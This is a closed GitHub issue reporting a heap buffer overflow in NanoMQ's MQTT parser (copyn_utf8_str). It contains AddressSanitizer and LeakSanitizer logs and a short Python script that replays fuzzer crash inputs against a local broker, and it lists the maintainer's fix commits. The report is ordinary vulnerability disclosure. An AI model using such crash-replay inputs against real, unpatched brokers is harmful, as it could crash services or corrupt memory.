Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

[Bug] Heap-based Buffer Overflow in mqtt_parser.c - copyn_utf8_str() #1043

Closed
realsung opened this issue Feb 8, 2023 · 1 comment
Closed

[Bug] Heap-based Buffer Overflow in mqtt_parser.c - copyn_utf8_str() #1043

realsung opened this issue Feb 8, 2023 · 1 comment
Assignees
@JaylinYu
Labels
bug

Comments

@realsung
Copy link

realsung commented Feb 8, 2023
edited

Describe the bug
Heap overflow occurred in copyn_utf8_str function of mqtt_parser.c Confirmed with address sanitizer

Expected behavior
A clear and concise description of what you expected to happen.

Actual Behavior
Heap Overflow(CWE-122)

To Reproduce

asan log

=================================================================
==104416==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000014a22 at pc 0x561da5470f06 bp 0x7f29911f39b0 sp 0x7f29911f39a0
READ of size 1 at 0x603000014a22 thread T12
    #0 0x561da5470f05 in copyn_utf8_str /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/sp/protocol/mqtt/mqtt_parser.c:225
    #1 0x561da547454d in conn_handler /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/sp/protocol/mqtt/mqtt_parser.c:711
    #2 0x561da5557a51 in tcptran_pipe_nego_cb /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/sp/transport/mqtt/broker_tcp.c:349
    #3 0x561da5456a2f in nni_taskq_thread /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/core/taskq.c:50
    #4 0x561da5457de7 in nni_thr_wrap /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/core/thread.c:94
    #5 0x561da5460f9c in nni_plat_thr_main /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/platform/posix/posix_thread.c:266
    #6 0x7f299a31eb42 in start_thread nptl/pthread_create.c:442
    #7 0x7f299a3b09ff  (/lib/x86_64-linux-gnu/libc.so.6+0x1269ff)

0x603000014a22 is located 0 bytes to the right of 18-byte region [0x603000014a10,0x603000014a22)
allocated by thread T13 here:
    #0 0x7f299a58a867 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x561da545c604 in nni_alloc /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/platform/posix/posix_alloc.c:20
    #2 0x561da542b76b in nng_alloc /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/nng.c:60
    #3 0x561da5557765 in tcptran_pipe_nego_cb /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/sp/transport/mqtt/broker_tcp.c:331
    #4 0x561da5456a2f in nni_taskq_thread /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/core/taskq.c:50
    #5 0x561da5457de7 in nni_thr_wrap /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/core/thread.c:94
    #6 0x561da5460f9c in nni_plat_thr_main /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/platform/posix/posix_thread.c:266
    #7 0x7f299a31eb42 in start_thread nptl/pthread_create.c:442

Thread T12 created by T0 here:
    #0 0x7f299a52e685 in __interceptor_pthread_create ../../../../src/libsanitizer/asan/asan_interceptors.cpp:216
    #1 0x561da54610cc in nni_plat_thr_init /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/platform/posix/posix_thread.c:279
    #2 0x561da5458093 in nni_thr_init /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/core/thread.c:121
    #3 0x561da5456d51 in nni_taskq_init /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/core/taskq.c:95
    #4 0x561da5457ab1 in nni_taskq_sys_init /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/core/taskq.c:294
    #5 0x561da5441a57 in nni_init_helper /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/core/init.c:35
    #6 0x561da5461471 in nni_plat_init /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/platform/posix/posix_thread.c:422
    #7 0x561da5441ad8 in nni_init /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/core/init.c:58
    #8 0x561da548585c in nni_proto_mqtt_open /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/sp/protocol.c:37
    #9 0x561da5481c00 in nng_nmq_tcp0_open /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/sp/protocol/mqtt/nmq_mqtt.c:1258
    #10 0x561da5426744 in broker /home/lab/Desktop/broker/nanomq3/nanomq/nanomq/apps/broker.c:865
    #11 0x561da542ac72 in broker_start /home/lab/Desktop/broker/nanomq3/nanomq/nanomq/apps/broker.c:1592
    #12 0x561da53f53bf in main /home/lab/Desktop/broker/nanomq3/nanomq/nanomq/nanomq.c:142
    #13 0x7f299a2b3d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58

Thread T13 created by T0 here:
    #0 0x7f299a52e685 in __interceptor_pthread_create ../../../../src/libsanitizer/asan/asan_interceptors.cpp:216
    #1 0x561da54610cc in nni_plat_thr_init /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/platform/posix/posix_thread.c:279
    #2 0x561da5458093 in nni_thr_init /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/core/thread.c:121
    #3 0x561da5456d51 in nni_taskq_init /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/core/taskq.c:95
    #4 0x561da5457ab1 in nni_taskq_sys_init /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/core/taskq.c:294
    #5 0x561da5441a57 in nni_init_helper /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/core/init.c:35
    #6 0x561da5461471 in nni_plat_init /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/platform/posix/posix_thread.c:422
    #7 0x561da5441ad8 in nni_init /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/core/init.c:58
    #8 0x561da548585c in nni_proto_mqtt_open /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/sp/protocol.c:37
    #9 0x561da5481c00 in nng_nmq_tcp0_open /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/sp/protocol/mqtt/nmq_mqtt.c:1258
    #10 0x561da5426744 in broker /home/lab/Desktop/broker/nanomq3/nanomq/nanomq/apps/broker.c:865
    #11 0x561da542ac72 in broker_start /home/lab/Desktop/broker/nanomq3/nanomq/nanomq/apps/broker.c:1592
    #12 0x561da53f53bf in main /home/lab/Desktop/broker/nanomq3/nanomq/nanomq/nanomq.c:142
    #13 0x7f299a2b3d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/lab/Desktop/broker/nanomq3/nanomq/nng/src/sp/protocol/mqtt/mqtt_parser.c:225 in copyn_utf8_str
Shadow bytes around the buggy address:
  0x0c067fffa8f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fffa900: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fa
  0x0c067fffa910: fa fa fd fd fd fd fa fa fd fd fd fa fa fa fd fd
  0x0c067fffa920: fd fd fa fa fd fd fd fa fa fa fd fd fd fd fa fa
  0x0c067fffa930: 00 00 00 00 fa fa fd fd fd fa fa fa fd fd fd fd
=>0x0c067fffa940: fa fa 00 00[02]fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fffa950: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fffa960: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fffa970: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fffa980: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fffa990: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==104416==ABORTING

import time 
import socket

def check_input(input, sleep_time = 0.01):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	while True:
		try:
			s.connect(('127.0.0.1', 1883))
			s.send(input)      
			s.close()
			break
		except ConnectionResetError:
			continue
		except ConnectionRefusedError:
			break

	time.sleep(sleep_time)

def check_crash_log(crash_log):
	for c in reversed(crash_log):
		c_bytes = bytearray.fromhex(c)
		status = check_input(c_bytes, 0.25)
		if status == False:
			print('[+] A crash was detected')
			return c_bytes
	print('[-] No crash..')
	exit(-1)

with open('target-1675833483.502341.txt', 'r') as f:
	crash_log = f.readlines()

check_crash_log(crash_log)

target file :
target-1675833483.502341.txt

** Environment Details **

  • NanoMQ version : v0.15.0-0
  • Operating system and version : Linux lab-virtual-machine 5.15.0-58-generic x86_64 x86_64 x86_64 GNU/Linux
  • Compiler and language used : I using ASAN build Option with Ninja Compile
  • testing scenario : Run the broker(asan build) with the ./nanomq start command, put the target file and the python file in the same path, and run python.

Client SDK
Using MQTT Raw Packet

Additional context
@JaylinYu JaylinYu self-assigned this Feb 11, 2023
@JaylinYu JaylinYu added the bug label Feb 11, 2023
JaylinYu added a commit to nanomq/NanoNNG that referenced this issue Feb 11, 2023
@JaylinYu
* FIX [mqtt_parser] fix security issue: nanomq/nanomq#1043
e831c20
JaylinYu added a commit to nanomq/NanoNNG that referenced this issue Feb 13, 2023
@JaylinYu
* FIX [mqtt_parser] fix security issue: nanomq/nanomq#1043
d4cc920
@JaylinYu
Copy link
Member

==88333==ERROR: LeakSanitizer: detected memory leaks

Direct leak of 168 byte(s) in 1 object(s) allocated from:
#0 0x7fb518c98a37 in __interceptor_calloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:154
#1 0x564ecf7d6fb5 in nni_zalloc /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/platform/posix/posix_alloc.c:26
#2 0x564ecf7c0f6b in nni_msg_alloc /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/message.c:387
#3 0x564ecfb348d4 in tcptran_pipe_recv_cb /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/sp/transport/mqtt/broker_tcp.c:766
#4 0x564ecf7d13af in nni_taskq_thread /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/taskq.c:50
#5 0x564ecf7d2767 in nni_thr_wrap /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/thread.c:94
#6 0x564ecf7db91c in nni_plat_thr_main /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/platform/posix/posix_thread.c:266
#7 0x7fb518570b42 in start_thread nptl/pthread_create.c:442

Direct leak of 168 byte(s) in 1 object(s) allocated from:
#0 0x7fb518c98a37 in __interceptor_calloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:154
#1 0x564ecf7d6fb5 in nni_zalloc /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/platform/posix/posix_alloc.c:26
#2 0x564ecf7c0f6b in nni_msg_alloc /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/message.c:387
#3 0x564ecf80390a in nano_pipe_start /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/sp/protocol/mqtt/nmq_mqtt.c:616
#4 0x564ecf7cdc88 in nni_listener_add_pipe /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/socket.c:1601
#5 0x564ecf7be3c1 in listener_accept_cb /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/listener.c:357
#6 0x564ecf7d13af in nni_taskq_thread /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/taskq.c:50
#7 0x564ecf7d2767 in nni_thr_wrap /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/thread.c:94
#8 0x564ecf7db91c in nni_plat_thr_main /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/platform/posix/posix_thread.c:266
#9 0x7fb518570b42 in start_thread nptl/pthread_create.c:442

Direct leak of 168 byte(s) in 1 object(s) allocated from:
#0 0x7fb518c98a37 in __interceptor_calloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:154
#1 0x564ecf7d6fb5 in nni_zalloc /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/platform/posix/posix_alloc.c:26
#2 0x564ecf7c0f6b in nni_msg_alloc /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/message.c:387
#3 0x564ecfb33fa4 in tcptran_pipe_recv_cb /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/sp/transport/mqtt/broker_tcp.c:670
#4 0x564ecf7d13af in nni_taskq_thread /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/taskq.c:50
#5 0x564ecf7d2767 in nni_thr_wrap /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/thread.c:94
#6 0x564ecf7db91c in nni_plat_thr_main /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/platform/posix/posix_thread.c:266
#7 0x7fb518570b42 in start_thread nptl/pthread_create.c:442

Indirect leak of 66 byte(s) in 1 object(s) allocated from:
#0 0x7fb518c98a37 in __interceptor_calloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:154
#1 0x564ecf7d6fb5 in nni_zalloc /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/platform/posix/posix_alloc.c:26
#2 0x564ecf7bfd46 in nni_chunk_grow /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/message.c:158
#3 0x564ecf7c0fbb in nni_msg_alloc /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/message.c:397
#4 0x564ecfb33fa4 in tcptran_pipe_recv_cb /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/sp/transport/mqtt/broker_tcp.c:670
#5 0x564ecf7d13af in nni_taskq_thread /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/taskq.c:50
#6 0x564ecf7d2767 in nni_thr_wrap /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/thread.c:94
#7 0x564ecf7db91c in nni_plat_thr_main /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/platform/posix/posix_thread.c:266
#8 0x7fb518570b42 in start_thread nptl/pthread_create.c:442

Indirect leak of 64 byte(s) in 1 object(s) allocated from:
#0 0x7fb518c98a37 in __interceptor_calloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:154
#1 0x564ecf7d6fb5 in nni_zalloc /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/platform/posix/posix_alloc.c:26
#2 0x564ecf7bfd46 in nni_chunk_grow /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/message.c:158
#3 0x564ecf7c0fbb in nni_msg_alloc /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/message.c:397
#4 0x564ecfb348d4 in tcptran_pipe_recv_cb /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/sp/transport/mqtt/broker_tcp.c:766
#5 0x564ecf7d13af in nni_taskq_thread /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/taskq.c:50
#6 0x564ecf7d2767 in nni_thr_wrap /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/thread.c:94
#7 0x564ecf7db91c in nni_plat_thr_main /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/platform/posix/posix_thread.c:266
#8 0x7fb518570b42 in start_thread nptl/pthread_create.c:442

Indirect leak of 64 byte(s) in 1 object(s) allocated from:
#0 0x7fb518c98a37 in __interceptor_calloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:154
#1 0x564ecf7d6fb5 in nni_zalloc /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/platform/posix/posix_alloc.c:26
#2 0x564ecf7bfd46 in nni_chunk_grow /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/message.c:158
#3 0x564ecf7c0fbb in nni_msg_alloc /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/message.c:397
#4 0x564ecf80390a in nano_pipe_start /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/sp/protocol/mqtt/nmq_mqtt.c:616
#5 0x564ecf7cdc88 in nni_listener_add_pipe /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/socket.c:1601
#6 0x564ecf7be3c1 in listener_accept_cb /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/listener.c:357
#7 0x564ecf7d13af in nni_taskq_thread /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/taskq.c:50
#8 0x564ecf7d2767 in nni_thr_wrap /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/core/thread.c:94
#9 0x564ecf7db91c in nni_plat_thr_main /home/jaylin/Projects/EdgeComputing/nanomq/nng/src/platform/posix/posix_thread.c:266
#10 0x7fb518570b42 in start_thread nptl/pthread_create.c:442

SUMMARY: AddressSanitizer: 698 byte(s) leaked in 6 allocation(s).

@JaylinYu JaylinYu mentioned this issue Feb 13, 2023
Closed
alvin1221 pushed a commit to nanomq/NanoNNG that referenced this issue Feb 14, 2023
@JaylinYu @alvin1221
* FIX [mqtt_parser] fix security issue: nanomq/nanomq#1043
edb4296
JaylinYu added a commit to nanomq/NanoNNG that referenced this issue Feb 15, 2023
@JaylinYu
* FIX [mqtt_parser] fix security issue: nanomq/nanomq#1043
0fce9ba
@JaylinYu JaylinYu mentioned this issue Feb 15, 2023
Merged
@gazer-star gazer-star mentioned this issue Apr 18, 2023
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@JaylinYu JaylinYu

Labels
bug
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@realsung @JaylinYu